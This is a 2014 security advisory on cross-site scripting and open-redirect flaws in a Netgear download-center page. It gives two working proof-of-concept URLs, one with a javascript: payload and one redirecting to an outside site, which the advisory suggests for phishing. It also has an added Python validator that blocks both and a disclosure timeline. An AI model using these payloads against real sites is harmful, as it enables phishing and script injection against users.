######################
# Exploit Title : downloadcenter.netgear.com XSS/Open redirection vulnerabilities.

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://www.netgear.com

# Date : 2014-07-19

# Tested on : Windows 7 / Mozilla Firefox
              Windows 7 / Chrome
              Linux / Mozilla Firefox

######################

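# Description:

The website "downloadcenter.netgear.com" suffers from cross-site scripting and open redirection vulnerabilities. Both issues are in the "redirecturl" parameter of /en/Disclaimer.aspx, whose value is used as the destination of the "Download" button.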

######################

# PoC Exploit:

 Redirection to any (phishing?) site:

1) Connect to url: http://downloadcenter.netgear.com/en/Disclaimer.aspx?redirecturl=http://www.homelab.it

2) Click on "Download" button


 Reflected XSS:
 
1) Connect to url: http://downloadcenter.netgear.com/en/Disclaimer.aspx?redirecturl=javascript://www.xss.com?xss=%250aalert%2528/XSS/%2529

2) Click on "Download" button


# PoC video is available at:

https://www.youtube.com/watch?v=JCDDk_0_mQ8
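
# Mitigation sketch (added example, not part of the original advisory and not vendor code):

Both PoCs work because the "redirecturl" value reaches the "Download" button without a scheme or host check. The validator below shows the check that rejects both values. The host allowlist, the fallback path and the function names are assumptions made for this illustration.

```python
from urllib.parse import parse_qs, urlsplit

# Assumption: the only hosts the Download button may point to.
ALLOWED_HOSTS = {"downloadcenter.netgear.com", "www.netgear.com"}
FALLBACK = "/en/"  # assumption: safe landing path used when the target is rejected

# The two PoC request URLs from this advisory.
POC_REDIRECT = ("http://downloadcenter.netgear.com/en/Disclaimer.aspx"
                "?redirecturl=http://www.homelab.it")
POC_XSS = ("http://downloadcenter.netgear.com/en/Disclaimer.aspx"
           "?redirecturl=javascript://www.xss.com?xss=%250aalert%2528/XSS/%2529")


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS):
    """True only for a rooted same-site path or an http(s) URL on an allowed host."""
    # Whitespace, control characters and backslashes are parsed differently by
    # browsers and servers, so refuse them outright.
    if not target or any(ord(c) < 0x21 or c == "\\" for c in target):
        return False
    try:
        parts = urlsplit(target)
        host = (parts.hostname or "").lower()
    except ValueError:  # malformed authority, e.g. a broken IPv6 literal
        return False
    if not parts.scheme and not parts.netloc:
        # Relative target: must start with exactly one "/" ("//host" is off-site).
        return target.startswith("/") and not target.startswith("//")
    # Absolute target: the scheme check rejects javascript:, data:, etc.
    if parts.scheme.lower() not in ("http", "https"):
        return False
    return host in allowed_hosts


def resolve_redirect(request_url):
    """Destination to emit for the Download button on this request."""
    values = parse_qs(urlsplit(request_url).query).get("redirecturl", [])
    # Duplicate parameters are ambiguous between parsers; treat them as invalid.
    target = values[0] if len(values) == 1 else ""
    return target if is_safe_redirect(target) else FALLBACK
```

The scheme check is what stops the XSS PoC regardless of how the payload after "javascript:" is encoded; the host allowlist is what stops the redirection PoC.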


######################

# Vulnerability Disclosure Timeline:

2014-07-19:  Discovered vulnerability
2014-07-19:  Vendor Notification
2014-08-01:  No Vendor Response/Feedback
2014-08-14:  Vendor Notification
2014-09-19:  No Vendor Response/Feedback 
2014-09-19:  Public Disclosure

######################

Discovered By : Claudio Viviani
		http://www.homelab.it

		info@homelab.it
		homelabit@protonmail.ch

		https://www.facebook.com/homelabit
		https://twitter.com/homelabit
		https://plus.google.com/+HomelabIt1/
		https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################